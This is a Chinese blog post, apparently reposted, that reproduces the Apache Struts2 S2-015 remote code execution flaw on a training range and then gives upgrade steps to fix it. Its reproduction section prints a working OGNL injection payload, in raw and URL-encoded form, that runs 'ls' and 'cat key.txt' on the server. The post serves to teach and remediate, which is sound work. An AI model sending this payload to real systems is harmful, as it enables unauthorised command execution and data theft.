Apache Struts2远程代码执行漏洞(S2-015)复现及修复方案 「建议收藏」

Apache Struts2远程代码执行漏洞(S2-015)复现及修复方案 「建议收藏」ApacheStruts2远程代码执行漏洞(S2-015)介绍ApacheStruts2是用于开发JavaEEWeb应用程序的开源Web应用框架。ApacheStruts2.0.0至2.

大家好,又见面了,我是你们的朋友全栈君。

Apache Struts2远程代码执行漏洞(S2-015)介绍

Apache Struts 2是用于开发JavaEE Web应用程序的开源Web应用框架。Apache Struts 2.0.0至2.3.14.2版本中存在远程命令执行漏洞。远程攻击者可借助带有‘${}’和‘%{}’序列值(可导致判断OGNL代码两次)的请求,利用该漏洞执行任意OGNL代码。

影响版本:2.0.0至2.3.14.2版本。

CVE编号:CVE-2013-2135

Apache Struts2远程代码执行漏洞(S2-015)复现

原本说自己搭建一个环境演示一下漏洞,后来想起来墨者学院(https://www.mozhe.cn/)里面有一些漏洞靶场环境,找了找还真的有(~ ̄▽ ̄)~。

打开靶机:

image

虽然我们知道这是含有Apache Struts2远程代码执行漏洞(S2-015)的靶机,不过我们还是按照正常步骤来测试一下,我用的是Struts2-Scan扫描工具,在此附上下载链接和使用方法(https://github.com/HatBoy/Struts2-Scan)。

注意:使用时要求 Python3.6.X及其以上版本。

运行:

image

开始扫描:

image

发现存在S2-012,S2-046,S2-015漏洞。我在网上看到不少在这里就转到了利用S2-46漏洞直接接行了命令执行或shell上传,说好的S2-015漏洞呢!!就像下面这样。直接就可以找到key:

image

在这里我们通过写入exp的方式利用S2-015漏洞。

${#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess’),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ls’).getInputStream()),#q}.action

当然,要经过url编码才能使用:

/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27ls%27%29.getInputStream%28%29%29%2C%23q%7D.action

image

上图我们发现存在key.txt文件,读取他就可以了,输入:

%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action

image

这样,key就出来了。当然我们的目的并不是得到key,只是要复现一下S2-015漏洞,体现一下这个漏洞的危害,下面我讲述一下如何修复这个漏洞。
Apache Struts2远程代码执行漏洞(S2-015)修复

Apache Struts2远程代码执行漏洞(S2-015)修复

注意

更新Struts版本可能出现兼容性问题,导致业务无法正常运行。
需要重启Tomcat
升级前,建议备份旧版Struts项目目录

修复流程

确定Struts版本 > 下载新版Struts库并校验SHA256 > 备份Struts库 > 删除旧版Struts库 > 替换 新版Struts库 > 验证修复结果 > 完成

步骤一:确定Struts版本

先确定Struts应用根路径(下面简写为root_dir),如:D:\apache-tomcat-7.0.103\webapps\struts2-showcase,然后找到root_dir\WEB-INF\lib\struts2-core-x.x.x.jar,其中x.x.x 即为版本号。如图:Struts版本为2.3.37:

image

步骤二:下载新版Struts库并校验SHA256

原本2.3以下版本的用户请下载2.3.37或以上的包,原本2.5以上版本的用户请下载2.5.22或以上的包。(注意:通过以下链接下载Struts库需要到外网,无法下载的用户可前往官网下载最新版: https://struts.apache.org/download.cgi)

下载链接如下:
2.3.37版本:
https://archive.apache.org/dist/struts/2.3.37/struts-2.3.37-min-lib.zip
2.5.22版本:
https://archive.apache.org/dist/struts/2.5.22/struts-2.5.22-min-lib.zip

打开cmd命令提示符,执行命令,得到文件SHA256。certutil -hashfile 文件路径 SHA256

例如:certutil -hashfile D:\sain\struts-2.3.37.min-lib.zip SHA256

如果得到的SHA256与下面的SHA256值一致,则下载正确

2.3.37 版本:22f09a1c4cdb760fa13f3e36a84f53682201924f63c65d265ec42ea6dc5e5f53

2.5.22 版本:8da7f12b3525abb0f074b95c90e447b590166ba6baefba776b01584562d07148

步骤三:备份旧版Struts库

备份root_dir\WEB-INF\lib目录

步骤四:删除旧版Struts库

2.3.x及以下版本需要删除的包如下:(不存在的就忽略)

commons-fileupload-xxx.jar

commons-io-xx.jar

commons-lang3-xx.jar(注意是commons-lang3而不是commons-lang)

commons-logging-xxx.jar

freemarker-xxx.jar

javassist-xxx.GA.jar

ognl-xxx.jar

struts2-core-xxx.jar

xwork-core-xxx.jar或xwork-xxx.jar??

2.5.x需要删除的包如下:(不存在的就忽略)

commons-fileupload-xxx.jar

commons-io-xx.jar

commons-lang3-xx.jar(注意是commons-lang3而不是commons-lang)

freemarker-xxx.jar或freemarker-xxx-incubating.jar??

javassist-xxx-GA.jar

log4j-api-xxx.jar

ognl-xxx.jar

struts2-core-xxx.jar

步骤五:替换新版Struts库

将新包中lib目录的jar包,复制到Struts项目的lib目录中(即D:\apache-tomcat- 7.0.103\webapps\struts2-showcase\WEB-INF\lib)

步骤六:重启Tomcat

修复完成,请检查所有业务是否正常!

Apache Struts2远程代码执行漏洞(S2-015)防护

因为更新需要重启Tomcat,对于正在进行业务的服务器来说是不方便的,所以如果在边界配有防火墙,可以配置相应的策略进行封堵。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/154412.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • mysql 幂等(什么是幂等性)

    一、什么是幂等?幂等性:多次调用方法或者接口不会改变业务状态,可以保证重复调用的结果和单次调用的结果一致。二、使用幂等的场景1、前端重复提交用户注册,用户创建商品等操作,前端都会提交一些数据给后台服务,后台需要根据用户提交的数据在数据库中创建记录。如果用户不小心多点了几次,后端收到了好几次提交,这时就会在数据库中重复创建了多条记录。这就是接口没有幂等性带来的bug。2、接口超时重试对于给第三方调…

  • Jenkins(2)docker容器中安装python3「建议收藏」

    Jenkins(2)docker容器中安装python3「建议收藏」前言使用docker安装jenkins环境,jenkins构建的workspace目录默认是在容器里面构建的,如果我们想执行python3的代码,需进容器内部安装python3的环境。进jenki

  • MySQL建立索引的优点和缺点

    MySQL建立索引的优点和缺点建立索引的优缺点:为什么要创建索引呢?        这是因为,创建索引可以大大提高系统的性能。         第一、通过创建唯一性索引,可以保证数据库表中每一行数据的唯一性。         第二、可以大大加快数据的检索速度,这也是创建索引的最主要的原因。         第三、可以加速表和表之间的连接,特别是在实现数据的参考完整性方面特别有意义。         第四、在使用分组和排序子句…

  • 前端使用ajax_ajax属于前端吗

    前端使用ajax_ajax属于前端吗原生AJAX名称:异步的javascriptandxml原理:通过XMLHttpRequest与服务器交换数据服务器数据通过json或者xml格式返回浏览器通过js+css渲染展示数据GET创建xhropen打开连接监听readystatereadyState4准备状态完毕status状态码200响应成功send发送<buttonid=”btn”>点击</button> <pid=”content”></p

  • 分布式Session共享解决方案「建议收藏」

    Session是服务器用来保存用户操作的一系列会话信息,由Web容器进行管理。单机情况下,不存在Session共享的情况,分布式情况下,如果不进行Session共享会出现请求落到不同机器要重复登录的情况,一般来说解决Session共享有以下几种方案。1、session复制session复制是早期的企业级的使用比较多的一种服务器集群session管理机制。应用服务器开启web容器的sessi…

  • oracle查看表字段类型_oracle更改表字段类型

    oracle查看表字段类型_oracle更改表字段类型查看oracle中的表的字段类型的sql:selectCOLUMN_NAME,DATE_TYPE,DATA_LENGTH,DATA_PRECISIONfromall_tab_columns

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号